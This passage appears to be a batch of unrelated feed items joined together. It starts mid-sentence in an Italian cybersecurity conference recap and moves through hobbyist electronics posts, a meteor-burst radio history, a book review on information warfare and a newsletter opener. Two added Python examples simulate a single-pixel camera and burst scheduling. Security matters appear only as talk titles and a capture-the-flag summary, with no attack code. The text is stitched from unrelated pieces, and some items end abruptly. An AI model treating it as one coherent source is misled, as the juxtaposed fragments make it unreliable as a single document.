his trademark “Malware Chef” hat, who shared one of his best recipes: “Come Cucinare Una LLM Backdoor”.
The long list would also be incomplete without the talks by Luca Almici, CEO of Enterprise, with “Log Management e Sicurezza”; Luigi Martire, Cyber Threat Intelligence Analyst at Tinexta, with “Threat intelligence e attribution: caccia agli APT”; and Selene Giupponi, Managing Director Europe at Resecurity, with “Le Nuove Frontiere Della CTI Nell’era Dell’intelligenza Artificiale”. Nor would it be complete without Nicola Dalla Vecchia, Senior Solutions Engineer, with “Attacchi alle API: il bersaglio nascosto della tua infrastruttura”; Irene Sorani, cybersecurity expert, with “La strada lastricata di buone intenzioni: Verso Il Disastro Perfetto”; Raniero Rapone, Cyber Security Consulting Director & CYRAA Design Lead, with “Cyber Risk: quanto pensi di conoscerlo?”; Giuliano Rulli, COO of Oplium Italia, with “Il lato oscuro del Cloud: i dati sono al sicuro?”; Diego Fasano, CEO of Ermetix, with “Anatomia di un attacco Mobile: sorveglianza elettronica ed esfiltrazione dati”; Andrea Paita, Cybersecurity Services Manager, with “Cyber Threat Intelligence e AI: Tecnologie e Strumenti Al Servizio Del SOC”; Andrea Acito, Managing Director of Digimat, with the topical “Cybersecurity per le PMI: Dalla Consapevolezza alla Difesa Attiva”; and Dario Pasquini, Principal Researcher at RSAC, with “Hacking back the AI hacker: defending against LLM-Driven cyberattacks”.
The opening day on 8 May engaged guests with the traditional ‘hands-on’ workshops held in collaboration with Accenture Italia, in which participants could try the technologies directly through ad hoc exercises aimed at honing the skills learned, such as building an AI Visual Object Tracking system, how to hack a WordPress site, or entering the Dark Web safely. Space was also given to topics such as cyberbullying, with Flavia Rizza, and social engineering, with a look at emerging deepfakes.
Red Hot Cyber Conference: the Capture The Flag
The same day saw the launch of Red Hot Cyber’s third Capture The Flag (CTF), held in collaboration with CyberSecurityUp by Fata Informatica, Hackmageddon World and the Fondazione Bruno Kessler (FBK), with challenges on social engineering. The competition, coordinated by the ethical hackers Antonio Montillo, Vincenzo Alonge, Andrea Tassotti and Thomas Kirschner, the Hackerwood hacker collective and security researcher Daniele Santoro, put many participants to a hard test.
The objective of the 111 hackers, spread across 32 teams, was to strike a state’s critical infrastructure, in addition to dealing with a bomb to be defused.
The winners of the RHC 2025 edition, awarded on the evening of 9 May after two days of extraordinary effort, were the unbeatable PizzaFeijoda, followed by the up-and-coming Winnerz and the veteran CarbonHackers.
Once again the Capture The Flag, with its social engineering challenges, analysis and cryptography, vulnerability exploitation, web hacking and more, proved to be a way to develop problem-solving skills, improvisation and creativity, critical thinking, team spirit and defensive and offensive strategy; but above all, what was rewarded was tenacity and perseverance, fundamental qualities for a hacker, as for anyone working in cybersecurity or in computing in general, because without them even the most brilliant talent would risk not getting far.
Un appuntamento consolidato, giunto alla sua quarta edizione
Un’esperienza da ripetere? Sì, l’esperienza della Red Hot Cyber Conference si sta consolidando come un appuntamento fisso per i partecipanti, grazie all’elevato livello dei contenuti, alla presenza di ospiti di rilievo e all’attenzione verso la formazione dei giovani talenti. L’evento, giunto alla sua quarta edizione, continua a crescere in partecipazione e qualità, proponendo workshop pratici, competizioni di hacking e conferenze con esperti e rappresentanti istituzionali, un mix che rende la conferenza di RHC un’occasione imperdibile per chiunque sia interessato alla cybersecurity, all’innovazione tecnologica e alla cultura digitale, con un programma che punta a ripetersi e migliorarsi negli anni a venire!
L'articolo RHC Conference 2025: 2 giorni di sicurezza informatica tra panel, workshop e Capture The Flag proviene da il blog della sicurezza informatica.
The ZX Spectrum Logic Analyzer
We know [Happy Little Diodes] frequently works with logic analyzer projects. His recent wireless logic analyzer for the ZX Spectrum is one of the oddest ones we’ve seen in a while. The heart of the system is an RP2040, and there are two boards. One board interfaces with the computer, and another hosts the controller.
The logic analyzer core is powered by a common open-source analyzer from [Eldrgusman]. This is one of the nice things about open source tools. Most people probably don’t need a logic analyzer that plugs directly into a ZX Spectrum. But if you do, it is fairly simple to repurpose a more generic piece of code and rework the hardware, if necessary.
You used to pay top dollar to get logic analyzers that “knew” about common CPUs and could capture their bus cycles, show execution, and disassemble the running code. But using a technique like this, you could easily decode any processor, even one you’ve designed yourself. All you need to do is invest the time to build it, if no one else has done it yet.
[Happy Little Diodes] is a big fan of the [Eldrgusman] design. What we would have given for a logic analyzer like this forty years ago.
A Single-Pixel Camera Without Moving Parts Using Compressed Sensing
One of the reconstructed images, using all 4,096 matrix patterns as input, next to the original object. (Credit: okooptics, Jon Bumstead)
There’s a strange allure to single-pixel cameras, thanks to their simplicity combined with the fascinating features they can offer, such as no set resolution limit. That said, the typical implementations that use some kind of scanning (MEMS) mirror or similar approach suffer from various issues, even when you’re photographing a perfectly stationary and static scene, due to their complex mechanical nature. Yet there’s a way around this, involving an LED matrix and a single photoresistor, as covered by [Jon Bumstead] in an article with accompanying video.
As he points out, this isn’t a new concept, with research papers cited that go back many years. At the core lies the signal processing technique called compressed sensing, which is incidentally also used with computed tomography (CT) and magnetic resonance imaging (MRI) scanners. Compressed sensing enables the reconstruction of a signal from a series of samples, by using existing knowledge of the signal.
In the case of this single-pixel camera, the known information is the illumination, which is a Hadamard matrix pattern displayed on the 64 x 64 pixel LED matrix, ergo 4,096 possible patterns. A total of 4,096 samples are thus recorded, which are subsequently processed with a Matlab script. As pointed out, even 50% of the maximum possible matrices can suffice here, with appropriately chosen patterns.
While not an incredibly fast method, it is fully solid-state, can be adapted to use other wavelengths, and with some tweaking of the used components probably could cut down the sampling time required.
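To make the measurement-and-reconstruction step concrete, here is an added example (written for this page; it is not [Jon Bumstead]’s Matlab script or any code from the build). It simulates the camera at a reduced 8×8 scale: the 64 rows of a Sylvester Hadamard matrix become on/off LED patterns, a single detector sums the light from the lit pixels, and the scene is recovered by applying the transpose. The test scene, the 8×8 scale and the differential trick that turns 0/1 patterns back into ±1 measurements are assumptions of the example; the real build scales the same idea to a 64×64 matrix and 4,096 patterns.

```python
"""Single-pixel camera simulation with Hadamard illumination patterns.

Added example (not the project's own code). Assumes an 8x8 scene so that
the 64-row Sylvester Hadamard matrix supplies one pattern per pixel; the
real build scales the same idea to a 64x64 LED matrix (4,096 patterns).
"""


def hadamard(order):
    """Sylvester construction of an order x order Hadamard matrix (+1/-1).

    order must be a power of two; each step doubles the matrix as
    [[H, H], [H, -H]].  The result is symmetric and satisfies H*H = n*I.
    """
    if order < 1 or order & (order - 1):
        raise ValueError("order must be a power of two")
    h = [[1]]
    while len(h) < order:
        h = [row + row for row in h] + [row + [-v for v in row] for row in h]
    return h


def on_off_patterns(h):
    """Map +1/-1 rows to 1/0 LED patterns: an LED cannot emit negative light."""
    return [[1 if v > 0 else 0 for v in row] for row in h]


def measure(scene, patterns):
    """Simulated photoresistor: total light reaching the sensor per pattern.

    scene is a flat list of pixel reflectances (0 = dark, 1 = bright);
    each sample is the sum over the pixels lit by that pattern.
    """
    return [sum(p * s for p, s in zip(pattern, scene)) for pattern in patterns]


def reconstruct(measurements, h):
    """Recover the scene from 0/1-pattern measurements.

    Row 0 of a Sylvester matrix is all ones, so measurements[0] is the
    total brightness T.  A 0/1 pattern P_k = (H_k + 1)/2 yields
    m_k = (H_k.x + T)/2, hence H_k.x = 2*m_k - T.  With H symmetric and
    H*H = n*I, x = H*(H x)/n, which is exact in integers for an integer scene.
    """
    n = len(h)
    total = measurements[0]
    hx = [2 * m - total for m in measurements]
    scene = []
    for j in range(n):
        acc = sum(h[k][j] * hx[k] for k in range(n))
        if acc % n:
            raise ValueError("inconsistent measurements")
        scene.append(acc // n)
    return scene


# Constructed 8x8 test scene: a bright square frame with a 2x2 centre.
SCENE = [
    [0, 0, 0, 0, 0, 0, 0, 0],
    [0, 1, 1, 1, 1, 1, 1, 0],
    [0, 1, 0, 0, 0, 0, 1, 0],
    [0, 1, 0, 1, 1, 0, 1, 0],
    [0, 1, 0, 1, 1, 0, 1, 0],
    [0, 1, 0, 0, 0, 0, 1, 0],
    [0, 1, 1, 1, 1, 1, 1, 0],
    [0, 0, 0, 0, 0, 0, 0, 0],
]


def run_camera(scene_rows=SCENE):
    """Flatten the scene, take one sample per pattern, reconstruct, and
    return (flat_scene, measurements, reconstruction)."""
    flat = [v for row in scene_rows for v in row]
    h = hadamard(len(flat))
    measurements = measure(flat, on_off_patterns(h))
    return flat, measurements, reconstruct(measurements, h)


if __name__ == "__main__":
    flat, samples, rec = run_camera()
    side = int(len(flat) ** 0.5)
    for r in range(side):
        print("".join("#" if v else "." for v in rec[r * side:(r + 1) * side]))
    print("samples taken:", len(samples), "exact:", rec == flat)
```

One sample is taken per pattern, so the number of samples equals the number of pixels; using fewer patterns, as the article mentions, needs a sparse-recovery solver in place of the plain transpose, which this example does not attempt.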
Work, Eat, Sleep, Repeat: Become a Human Tamagotchi
When [Terence Grover] set out to build a Tamagotchi-inspired simulator, he didn’t just add a few modern tweaks. He ditched the entire concept and rebuilt it from the ground up. Forget cute wide-eyed blobby animals and pixel-poop. This Raspberry Pi-powered project ditches nostalgia in favour of brutal realism: inflation, burnout, capitalism, and the occasional existential crisis. Think Sims meets cyberpunk, rendered charmingly in Python on a low-res RGB LED matrix.
Instead of hunger and poop meters, this dystopian pet juggles Maslow’s hierarchy: hunger, rest, safety, social life, esteem, and money. Players make real-life-inspired decisions like working, socialising, and going into education – each affecting the stats in logical (and often unfair) ways. No free lunch here: food requires money, money requires mind-numbing labour, and labour tanks your rest. You can even die of overwork à la Amazon warehouse. The UI and animation logic are all hand-coded, and there’s a working buzzer, pixel-perfect sprite movement, and even mini-games to simulate job repetition.
It’s equal parts social commentary and pixel art fever dream. While we have covered Tamagotchi recreations some time ago, this one makes you the needy survivor. Want your own dystopia in 64×32? Head over to [Terence Grover]’s GitHub and fork the full open source code. We’ll be watching. The Tamagotchi certainly is.
Unwinding an Unusual Slide Rule
If the Otis King slide rule in [Chris Staecker’s] latest video looks a bit familiar, you might be getting up there in age, or you might remember seeing us talk about one in our collection. Actually, we have two floating around one of the Hackaday bunkers, and they are quite the conversation piece. You can watch the video below.
The device is often mistaken for a spyglass, but it is really a huge slide rule with the scale wrapped around in a rod-shaped form factor. The video says the scale is the same as a 30-inch scale, but we think it is closer to 66 inches.
Slide rules work using the idea that adding up logarithms is the same as multiplying. For example, for a base 10 logarithm, log(10)=1, log(100)=2, and log(1000)=3. So you can see that 1+2=3. If the scales are printed so that you can easily add and then look up the antilog, you can easily figure out that 10×100=1000.
The black center part acts like a cursor on a conventional slide rule. How does it work? Watch [Chris’] video and you’ll see. We know from experience that one of these in good shape isn’t cheap. Lucky that [Chris] gives us a 3D printed version so you can make your own.
Another way to reduce the scale is to go circular, and you can make one of those, too.
Semiconductor Simulator Lets You Play IC Designer
For circuit simulation, we have always been enthralled with the Falstad simulator which is a simple, Spice-like simulator that runs in the browser. [Brandon] has a simulator, too, but it simulates semiconductor devices. With help from [Paul Falstad], that simulator also runs in the browser.
This simulator takes a little thinking and lets you build devices as you might on an IC die. The key is to use the drop-down that initially says “Interact” to select a tool. Then, the drop-down below lets you select what you are drawing, which can be a voltage source, metal, or various materials you find in semiconductor devices, like n-type or a dielectric.
It is a bit tricky, but if you check out the examples first (like this diode), it gets easier. The main page has many examples. You can even build up entire subsystems like a ring oscillator or a DRAM cell.
Designing at this level has its own quirks. For example, in the real world, you think of resistors as something you can use with great precision, and capacitors are often “sloppy.” On an IC substrate, resistors are often the sloppy component. While capacitor values might not be exact, it is very easy to get an extremely precise ratio of two capacitors because the plate size is tightly controlled. This leads to a different mindset than you are used to when designing with discrete components.
Of course, this is just a simulation, so everything can be perfect. If, for some reason, you don’t know about the Falstad simulator, check it out now.
Keebin’ with Kristina: the One With the MingKwai Typewriter
Sometimes, a little goes a long way. I believe that’s the case with this tiny media control bar from [likeablob] that uses an ESP32-C3 Super Mini.
Image by [likeablob] via Hackaday.IO
From left to right you’ve got a meta key that allows double functions for all the other keys. The base functions are play/pause, previous track, and next track while the knob handles volume.
And because it uses this Wi-Fi-enabled microcontroller, it can seamlessly integrate with Home Assistant via ESPHome.
What else is under the hood? Four low-profile Cherry MX Browns and a rotary encoder underneath that nicely-printed knob.
If you want to build one of these for yourself, all the files are available on GitHub including the customizable enclosure which [likeablob] designed with OpenSCAD.
Portable Endgame, If It Exists
Perhaps [Palpatine]’s one mistake in creating this 36-key portable endgame is believing in the idea of the endgame in the first place. But I’m not here to judge.
Image by [Palpatine] via reddit
Oh wait, yes I am! I really like this keyboard, and I think it would look right at home on the desk of the centerfold below it, although it’s supposed to be a go-anywhere contraption. Be sure to check out the gallery on this one to see it folded together for transport.
It would seem that [Palpatine] learned some nice tricks while designing this keyboard. Have you heard of 10440 batteries? They’re 3.7 V and usually cheaper than the square Li-Po batteries of the same size.
This bad boy is based on the Seeed Xiao nRF52840, which [Palpatine] believes is worth spending a little bit of extra money on instead of nice!nano clones, while being cheaper than an actual nice!nano would be.
As far as open-sourceness goes, [Palpatine] seems willing to share their design files, although they don’t seem to have been published anywhere at this time.
The Centerfold: White Light Might Bite At Night
Image by [Embarrased-Yak-3766] via reddit
So this one isn’t quite as wide as usual, but it’s definitely more white than usual. I suppose that wiiiide monitor makes up for the missing pixels.
What do you think? Crisp and clean, or cold and clinical? I can’t decide. I definitely feel snowbound vibes, and I want to sleep in.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Munson
Image by [Martin Howard] via Antique Typewriters
The delight of the Munson typewriter is in the exposed internal workings, which come to life when the machine is in use. Those octagonal key tops aren’t too shabby, either.
You may have noticed that this machine has no typebars. Instead, it uses a horizontal cylinder about the size of a finger. The cylinder slides from side to side and rotates to find the chosen character. Then a hammer strikes from behind the paper, pushing it against the ribbon and the type cylinder.
Much like the later IBM Selectrics and the daisy wheel machines of the 1970s and ’80s, one could easily change the font by swapping out the all-steel type cylinder. The Munson has two Shift keys, one for upper case and another for figures, so only three rows of keys are needed.
The Munson came out in 1890 and was well-received. It won the highest medal awarded at the World’s Fair Chicago, 1893, but the machines are hard to find these days. Eight years after its introduction, the design of the Munson was acquired by the Chicago Writing Machine Co. and rebranded the Chicago.
Finally, the MingKwai Typewriter Emerges From Obscurity
So you get a Historical Clackers two-fer this week; lucky you! After more than half a century, this fascinating Chinese typewriter turned up while a couple was cleaning out her grandfather’s basement in New York.
Jennifer Felix and her husband Nelson posted photos on a Facebook group trying to ID the machine. A flurry of enthusiastic comments flooded the forum, with many people offering to buy the machine.
Photo by Elisabeth von Boch, courtesy of Stanford Libraries; image via This Is Colossal
As it turns out, it’s a MingKwai — the only one in existence. And it’s now in the hands of Stanford Libraries.
This machine was invented in 1947 by a writer, translator, and linguist named Lin Yutang. The MingKwai, which means “clear and fast”, was the first compact concept Chinese typewriter to have a keyboard that was capable of producing 80,000+ characters.
How is that even possible? Mechanical sort and search. Seriously! Check this out: the 72-key board is made up of strokes and shapes, and the characters are arranged in linear order, like an English dictionary. To use it, you would press one of the 36 top keys and one of the 28 bottom keys simultaneously. This triggered a series of rotations in the internals and would bring eight characters into view in a small window that Lin called the “magic eye”. Finally, you would choose your desired character using the numbered keys in the bottom row.
The only known prototype was built by the Carl E. Krum company. Lin was unable to drum up commercial interest to produce it at scale, so he sold the rights and the prototype to Mergenthaler Linotype Company, where Jennifer Felix’s grandfather worked as a machinist. So it never went into production, and the prototype went home with Grandpa.
Got a hot tip that has like, anything to do with keyboards? Help me out by sending in a link or two. Don’t want all the Hackaday scribes to see it? Feel free to email me directly.
Print PLA in PLA with A Giant Molecular Model Kit
It isn’t too often we post a hack that’s just a pure 3D print with no other components, but for this Giant Molecular Model kit by [3D Printy], we’ll make an exception. After all, even if you print with PLA every day, how often do you get to play with its molecular bonds? (If you want to see that molecule, check out the video after the break.)
There are multiple sizes of bonds to represent bond lengths, and two styles: flexible and firm. Flexible bonds are great for multiple covalent bonds, like carbon-carbon bonds in organic molecules. The bonds clip to caps that screw into the atoms; alternatively, a bond-cap can screw the atoms together directly. A plethora of atoms is available, in valence values from one to four. The two-bond atom has 180- and 120-degree variations for greater accuracy. In terms of the chemistry this kit could represent, you’re only limited by your imagination and how long you are willing to spend printing atoms and bonds.
[3D Printy] was kind enough to release the whole lot as CC0 Public Domain, so we might be seeing these at craft fairs, as there’s nothing to keep you from selling the prints. Honestly, we can only hope; from an educational standpoint, this is a much better use of plastic than endless flexy dragons.
If you’d prefer your chemistry toys help you do chemistry, try this fidget spinner centrifuge. Perhaps you’d rather be teaching electronics instead?
The Information War: States Out to Conquer Our Minds
«Information is not a gala dinner; it is not a literary work, a drawing, an embroidery; it cannot be done with the same elegance, calm and delicacy, or with the same sweetness, kindness, courtesy, restraint and magnanimity. A revolution is an insurrection, an act of violence by which one class overthrows another.» If we substitute the word information for the word revolution in Mao Zedong’s original text, paraphrased here from the “Little Red Book” (pp. 12-13), we can condense into a single sentence the whole meaning that Professor David Colon wanted to convey with his new book La Guerra dell’Informazione. Gli Stati alla conquista delle nostre menti (The Information War: States Out to Conquer Our Minds; Piccola Biblioteca Einaudi, 2025).
According to the French professor, who teaches the history of communication, media and propaganda at the Sciences Po Centre d’Histoire in Paris, in the age of artificial intelligence and cognitive warfare, first the traditional media and then social media have become the theatre of a no-holds-barred conflict whose stake is our minds.
Colon describes in rich detail thirty years of this long-secret war, revealing the strategies of those who commissioned it and the logic of its protagonists: secret agents, diplomats, journalists and hackers.
While acknowledging that the logic of using information as a weapon of war has its cornerstones in Russian disinformatia, American political warfare and Chinese, Russian and American war doctrine, the professor chooses to open his narrative with an episode unknown to most: the battle for control of information at the time of the invasion of Kuwait by Saddam Hussein’s Iraq. It is a story that makes everyone who today fears fake news in the democratic process pale by comparison. At the time, to persuade the United States to intervene in support of the small but wealthy Gulf country threatened by Saddam, the emirate hired one of the largest public relations firms in the world, Hill & Knowlton, to create the necessary storytelling. Spending about 30 million dollars, hiring actors and paying newspapers and magazines, the first event of that war to be broadcast in unison by the international media was the account of a weeping young Kuwaiti nurse who, in front of the cameras, recounted how Saddam’s soldiery had entered the hospitals, tearing newborns from their cots and throwing them on the floor to die of cold, a story that moved the entire free world, but that was not true. It was a hoax. The event had never happened, and the young witness to the alleged facts was none other than the daughter of Kuwait’s ambassador to the UN.
Colon sketches many stories like this in his book, right up to the present day, to the Russian occupation of Crimea in 2014 and the invasion of the Donbass in 2022, in a war that is certainly fought in the mud of the Dnipro river but also in the trenches of the Internet, where regular and irregular armies confront one another with viruses, malware and propaganda, white, grey and black.
An engaging read that ranges from the use of memes to artificial intelligence in the Israel-Hamas conflict, describing the deployment of state hackers who partly steal (cryptocurrencies) and partly fight on the front of cyber sabotage. With one elephant in the room, however: the use that democratic states make of the media in their own countries to achieve the objectives their governments cannot declare.
Radio Apocalypse: Meteor Burst Communications
The world’s militaries have always been at the forefront of communications technology. From trumpets and drums to signal flags and semaphores, anything that allows a military commander to relay orders to troops in the field quickly or call for reinforcements was quickly seized upon and optimized. So once radio was invented, it’s little wonder how quickly military commanders capitalized on it for field communications.
Radiotelegraph systems began showing up as early as the First World War, but World War II was the first real radio war, with every belligerent taking full advantage of the latest radio technology. Chief among these developments was the ability of signals in the high-frequency (HF) bands to reflect off the ionosphere and propagate around the world, an important capability when prosecuting a global war.
But not long after, in the less kinetic but equally dangerous Cold War period, military planners began to see the need to move more information around than HF radio could support while still being able to do it over the horizon. What they needed was the higher bandwidth of the higher frequencies, but to somehow bend the signals around the curvature of the Earth. What they came up with was a fascinating application of practical physics: meteor burst communications.
Blame It on Shannon
In practical terms, a radio signal that can carry enough information to be useful for digital communications while still being able to propagate long distances is a bit of a paradox. You can thank Claude Shannon for that, after he developed the idea of channel capacity from the earlier work of Harry Nyquist and Ralph Hartley. The resulting Hartley-Shannon Theorem states that the bit rate of a channel in a noisy environment is directly related to the bandwidth of the channel. In other words, the more data you want to stuff down a channel, the higher the frequency needs to be.
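The theorem itself, as an added illustration not taken from the article (the channel widths and signal-to-noise ratio are assumed values chosen only to show the scaling): the capacity C of a channel of bandwidth B with signal-to-noise ratio S/N is

C = B × log2(1 + S/N)

At a fixed S/N of 100 (20 dB), a 3 kHz voice-grade HF channel gives C ≈ 3,000 × 6.66 ≈ 20 kbit/s, while a 100 kHz channel at VHF gives ≈ 666 kbit/s. The bit rate grows linearly with bandwidth, whereas the signal-to-noise ratio only enters through the logarithm, which is why the wider channels available at higher frequencies matter so much more than squeezing a few more dB out of an HF link.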
Unfortunately, that runs afoul of the physics of ionospheric propagation. Thanks to the interaction between radio waves and the charged particles between about 50 km and 600 km above the ground, the maximum frequency that can be reflected back toward the ground is about 30 MHz, which is the upper end of the HF band. Beyond that is the very high frequency (VHF) band from 30 MHz to 300 MHz, which has enough bandwidth for an effective data channel but to which the ionosphere is essentially transparent.
Luckily, the ionosphere isn’t the only thing capable of redirecting radio waves. Back in the 1920s, Japanese physicist Hantaro Nagaoka observed that the ionospheric propagation of shortwave radio signals would change a bit during periods of high meteoric activity. That discovery largely remained dormant until after World War II, when researchers picked up on Nagaoka’s work and looked into the mechanism behind his observations.
Every day, the Earth sweeps up a huge number of meteoroids; estimates range from a million to ten billion. Most of those are very small, on the order of a few nanograms, with a few good-sized chunks in the tens of kilograms range mixed in. But the ones that end up being most interesting for communications purposes are the particles in the milligram range, in part because there are about 100 million such collisions on average every day, but also because they tend to vaporize in the E-layer of the ionosphere, between 80 and 120 km above the surface. The air at that altitude is dense enough to turn the incoming cosmic debris into a long, skinny trail of ions, but thin enough that the free electrons take a while to recombine into neutral atoms. It’s a short time — anywhere between 500 milliseconds and a few seconds — but it’s long enough to be useful.
A meteor trail from the annual Perseid shower, which peaks in early August. This is probably a bit larger than the optimum for MBC, but beautiful nonetheless. Source: John Flannery, CC BY-ND 2.0.
The other aspect of meteor trails formed at these altitudes that makes them useful for communications is their relative reflectivity. The E-layer of the ionosphere normally has on the order of 10⁷ electrons per cubic meter, a density that tends to refract radio waves below about 20 MHz. But meteor trails at this altitude can have densities as high as 10¹¹ to 10¹² electrons/m³. This makes the trails highly reflective to radio waves, especially at the higher frequencies of the VHF band.
In addition to the short-lived nature of meteor trails, daily and seasonal variations in the number of meteors complicate their utility for communications. The rotation of the Earth on its axis accounts for the diurnal variation, which tends to peak around dawn local time every day as the planet’s rotation and orbit are going in the same direction and the number of collisions increases. Seasonal variations occur because of the tilt of Earth’s axis relative to the plane of the ecliptic, where most meteoroids are concentrated. More collisions occur when the Earth’s axis is pointed in the direction of travel around the Sun, which is the second half of the year for the northern hemisphere.
Learning to Burst
Building a practical system that leverages these highly reflective but short-lived and variable mirrors in the sky isn’t easy, as shown by several post-war experimental systems. The first of these was attempted by the National Bureau of Standards (NBS) in 1951. They set up a system between Cedar Rapids, Iowa, and Sterling, Virginia, a path length of about 1250 km. Originally built to study propagation phenomena such as forward scatter and sporadic E, the researchers noticed significant effects on their tests from meteor trails. This made them switch their focus to meteor trails, which caught the attention of the US Air Force, which was in the market for a four-channel continuous teletype link to its base in Thule, Greenland. It got the link, but only just barely, thanks to the limited technology of the time. The NBS also used the Iowa-to-Virginia system to study higher data rates by pointing highly directional rhombic antennas at each end of the connection at the same small patch of sky. They managed a whopping data rate of 3,200 bits per second with this system, but only for the second or so that a meteor trail happened to appear.
The successes and failures of the NBS system made it clear that a useful system based on meteor trails would need to operate in burst mode: jam data through the link for as long as it exists, then wait for the next one. The NBS tested a burst-mode system in 1958 that used the 50-MHz band and offered a full-duplex link at 2,400 bits per second. The system used magnetic tape loops to buffer data, and transmitters at both ends of the link operated continually to probe for a path. Whenever the receiver at one end detected a sufficiently strong probe signal from the other end, the transmitter would start sending data. The Canadians got in on the MBC action with their JANET system, which had a similar dedicated probing channel and tape buffer. In 1954 they established a full-duplex teletype link between Ottawa and Nova Scotia at 1,300 bits per second with an error rate of only 1.5%.
In the late 1950s, Hughes developed a single-channel air-to-ground MBC system. This was a significant development, not only because the equipment had gotten small enough to install on an airplane but also because it really refined the burst-mode technology. The ground stations in the Hughes system periodically transmitted a 100-bit interrogation signal to probe for a path to the aircraft. The receiver on the ground listened for an acknowledgement from the plane, which turned the channel around and allowed the airborne transmitter to send a 100-bit data burst. The system managed a respectable 2,400 bps data rate, but suffered greatly from ground-based interference from TV stations and automotive ignition noise.
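The probe, turn-around and burst cycle that the NBS and Hughes systems settled on can be sketched as a small scheduler. The Python below is an added example written for this page; it is not a description of any of the historical systems’ actual equipment or timings. The trail schedule, the 100 ms probe period and the 50 ms turn-around are constructed values; the 100-bit burst and the 2,400 bps burst rate are taken from the Hughes figures above. The point it shows is the one the NBS found: a trail that dies between two probes, or that is too short to fit a burst after the handshake, carries nothing, and the long-run throughput is a fraction of the rate achieved while a trail is open.

```python
"""Burst-mode scheduling over short-lived meteor trails (added example).

Times are integer milliseconds so the arithmetic is exact. A ground
station probes on a fixed period; when a probe lands inside a trail the
link turns around and fixed-size bursts are sent for as long as the trail
lasts. Nothing can be sent between trails, so the average throughput is
far below the burst rate.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Trail:
    start_ms: int      # when the ionised trail becomes reflective
    duration_ms: int   # how long it stays usable (hundreds of ms to seconds)

    @property
    def end_ms(self):
        return self.start_ms + self.duration_ms


def burst_transfer(trails, total_bits, rate_bps=2400, probe_period_ms=100,
                   turnaround_ms=50, burst_bits=100):
    """Schedule total_bits across the given trails.

    Returns (finish_ms, bursts): bursts is a list of
    (trail_start_ms, burst_end_ms, bits); finish_ms is None when the
    trails could not carry all of the data.
    """
    # Integer ceiling: 100 bits at 2400 bps takes 41.7 ms -> 42 ms slots.
    burst_ms = -(-burst_bits * 1000 // rate_bps)
    remaining = total_bits
    bursts = []
    for trail in sorted(trails, key=lambda t: t.start_ms):
        # First probe instant that falls inside the trail, if any does.
        first_probe = -(-trail.start_ms // probe_period_ms) * probe_period_ms
        if first_probe >= trail.end_ms:
            continue                        # trail died between two probes
        t = first_probe + turnaround_ms     # handshake done, channel open
        while remaining > 0 and t + burst_ms <= trail.end_ms:
            sent = min(burst_bits, remaining)
            t += burst_ms
            remaining -= sent
            bursts.append((trail.start_ms, t, sent))
        if remaining == 0:
            return t, bursts
    return None, bursts


def effective_rate_bps(total_bits, finish_ms):
    """Average throughput including the dead time between trails."""
    return total_bits * 1000 / finish_ms


# Constructed trail schedule: three usable trails plus two that are either
# too short to be probed or too short to fit a burst after the turn-around.
TRAILS = [
    Trail(120, 50),      # ends at 170 ms, before the next probe at 200 ms
    Trail(200, 80),      # probed at 200 ms, but 50 + 42 ms does not fit
    Trail(800, 600),
    Trail(3000, 1200),
    Trail(6500, 500),
]


def demo(total_bits=4500):
    """Return (finish_ms, number_of_bursts, average_bps) for the sample schedule."""
    finish, bursts = burst_transfer(TRAILS, total_bits)
    rate = effective_rate_bps(total_bits, finish) if finish else 0.0
    return finish, len(bursts), rate


if __name__ == "__main__":
    finish, n_bursts, rate = demo()
    print(f"delivered in {n_bursts} bursts, finished at {finish} ms, "
          f"average {rate:.0f} bps against 2400 bps while a trail is open")
```

With the sample schedule the 4,500 bits take 45 bursts across three trails and the average works out to roughly a quarter of the burst rate; asking for more bits than the trails can carry returns None, which is the case a real system handles by buffering (the tape loops above) and waiting for the next trail.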
The SHAPE of Things to Come
Supreme HQ Allied Powers Europe (SHAPE), NATO’s European headquarters in the mid-60s. The COMET meteor-bounce system kept NATO commanders in touch with member-nation HQs via teletype. Source: NATO
The first major MBC system fielded during the Cold War was the Communications by Meteor Trails system, or COMET. It was used by the North Atlantic Treaty Organization (NATO) to link its far-flung outposts in member nations with Supreme Headquarters Allied Powers Europe, or SHAPE, located in Belgium. COMET took cues from the Hughes system, especially its error detection and correction scheme. COMET was a robust and effective MBC system that provided between four and eight teletype circuits depending on daily and seasonal conditions, each handling 60 words per minute.
COMET was in continuous use from the mid-1960s until well after the official end of the Cold War. By that point, secure satellite communications were nowhere near as prohibitively expensive as they had been at the beginning of the Space Age, and MBC systems became less critical to NATO. They weren’t retired, though, and COMET actually still exists, although rebranded as “Compact Over-the-Horizon Mobile Expeditionary Terminal.” These man-portable systems don’t use MBC; rather, they use high-power UHF and microwave transmitters to scatter signals off the troposphere. A small amount of the signal is reflected back to the ground, where high-gain antennas pick up the vanishingly weak signals.
Although not directly related to Cold War communications, it’s worth noting that there was a very successful MBC system fielded in the civilian space in the United States: SNOTEL. We’ve covered this system in some depth already, but briefly, it’s a network of stations in the western part of the USA with the critical job of monitoring the snowpack. A commercial MBC system connected the solar-powered monitoring stations, often in remote and rugged locations, to two different central bases. Taking advantage of diurnal meteor variations, each morning the master station would send a polling signal out to every remote, which would then send back the previous day’s data once a return path was opened. The system could collect data from 180 remote sites in just 20 minutes. It operated successfully from the mid-1970s until just recently, when pervasive cell technology and cheap satellite modems made the system obsolete.
A shift away from AI rulemaking
IT'S MONDAY, AND THAT MEANS DIGITAL POLITICS. I'm Mark Scott, and hope to see some of you at the tech policy meet-up I'm co-hosting in Brussels on May 15. I also have my first meeting of Ofcom's Online Information Advisory Committee on May 16 — wish me luck!
— The drive to regulate artificial intelligence has given way to a desire to harness the emerging technology for economic benefit and national security.
— India and Pakistan agreed to a ceasefire in a quickly escalating regional conflict. That didn't stop waves of disinformation from spreading on social media.
— Platforms, citizens and governments should be responsible for creating a healthy digital environment, according to a global survey. But companies are more responsible than others for combating hateful online speech.
Let's get started:
What’s in a Washer?
Some things are so common you forget about them. How often do you think about an ordinary resistor, for example? Yet if you have a bad resistor, you’ll find it can be a big problem. Plus, how can you really understand electronics if you don’t know all the subtle details of a resistor? In the mechanical world, you could make the same arguments about the washer, and [New Mind] is ready to explain the history and the gory details of using washers in a recent video that you can see below.
The simple answer is that washers allow a bolt to fit in a hole otherwise too large, but that’s only a small part of the story. Technically, what you are really doing is distributing the load of a threaded fastener. However, washers can also act as spacers or springs. Some washers can lock, and some indicate various things like wear or preloading conditions.
